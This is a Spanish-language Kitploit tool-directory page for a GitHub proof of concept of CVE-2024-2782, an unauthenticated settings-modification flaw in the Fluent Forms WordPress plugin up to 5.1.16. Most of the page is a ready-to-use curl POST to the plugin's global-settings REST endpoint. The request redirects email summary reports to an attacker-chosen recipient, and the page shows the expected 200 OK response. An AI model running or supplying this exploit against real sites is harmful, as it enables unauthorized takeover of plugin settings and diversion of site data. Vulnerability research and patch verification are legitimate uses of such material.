Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-2782-PoC — CVE-2024-2782 Prueba de Concepto | Kitploit
Herramientas/GitHubGitHub/whale93/cve-2024-2782-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubwhale93/cve-2024-2782-poc

CVE-2024-2782-PoC

CVE-2024-2782 Prueba de Concepto

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-2782-PoC

Prueba de concepto de CVE-2024-2782

El complemento Contact Form Plugin by Fluent Forms para Quiz, Survey y Drag & Drop WP Form Builder para WordPress es vulnerable a la modificación no autorizada de datos debido a una falta de verificación de capacidad en el endpoint de la API REST /wp-json/fluentform/v1/global-settings en todas las versiones hasta la 5.1.16 inclusive. Esto permite que atacantes no autenticados modifiquen toda la configuración del complemento.

Requisitos previos

  • Sitio WordPress con Contact Form – Fluent Forms ≤ 5.1.16 activo.
  • El atacante puede alcanzar la API REST del sitio (no se necesita autenticación).

Comando de explotación

root@kitploit:~
curl -i -X POST "http://TARGET/wp-json/fluentform/v1/global-settings"
  -H "Content-Type: application/json"
  -d '{
  "key": "emailSummarySettings",
  "email_report": "{"send_to_type":"custom","custom_recipients":"[email protected]"}"
}'

Respuesta esperada

root@kitploit:~
HTTP/1.1 200 OK
Date: Thu, 31 Jul 2025 13:11:49 GMT
Server: Apache/2.4.62 (Debian)
X-Powered-By: PHP/8.3.11
X-Robots-Tag: noindex
Link: <http://target:9090/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Allow: POST
Content-Length: 4
Content-Type: application/json; charset=UTF-8

true

Captura de pantalla image

Verificar cambios en la base de datos de WordPress image

Descargar herramienta